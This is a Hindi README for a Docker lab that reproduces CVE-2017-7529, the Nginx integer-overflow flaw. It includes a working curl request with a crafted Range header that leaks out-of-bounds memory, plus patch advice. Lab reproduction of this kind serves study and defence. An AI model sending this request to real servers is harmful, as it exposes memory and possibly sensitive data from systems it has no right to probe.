
Docker-आधारित प्रजनन वातावरण CVE-2017-7529 Nginx पूर्णांक अतिप्रवाह भेद्यता के लिए, जो चरण-दर-चरण शोषण मार्गदर्शिका के साथ तैयार किए गए Range हेडर के माध्यम से जानकारी प्रकटीकरण प्रदर्शित करता है।
Nginx एक उच्च-प्रदर्शन वेब सर्वर है और इसका उपयोग रिवर्स प्रॉक्सी, कैश सर्वर आदि के रूप में व्यापक रूप से किया जाता है।
Nginx 1.13.2 और उससे नीचे के संस्करणों में, पूर्णांक अतिप्रवाह (Integer Overflow) के कारण, एक हमलावर Range हेडर में हेरफेर करके मूल प्रतिक्रिया सीमा से बाहर के मेमोरी टुकड़ों या संवेदनशील जानकारी को लीक कर सकता है।
bash
docker compose up -d
arduino
http://your-ip:8080
bash
curl -v -H "Range: bytes=-9223372036854,5" http://your-ip:8080/
यह कमजोरी केवल एक साधारण HTTP अनुरोध से ही सूचना प्रकटीकरण (Information Disclosure) उत्पन्न कर सकती है।
यदि इसमें संवेदनशील कॉन्फ़िगरेशन जानकारी या अन्य लीक होने योग्य डेटा शामिल है, तो यह गंभीर सुरक्षा घटना का कारण बन सकता है।
पैच: Nginx 1.13.3 या उससे ऊपर के संस्करण में अपडेट करने की अनुशंसा की जाती है।
bash
CVE-2017-7529/
├── Dockerfile
├── docker-compose.yml
├── nginx.conf
├── index.html
└── README.md <-- यह दस्तावेज़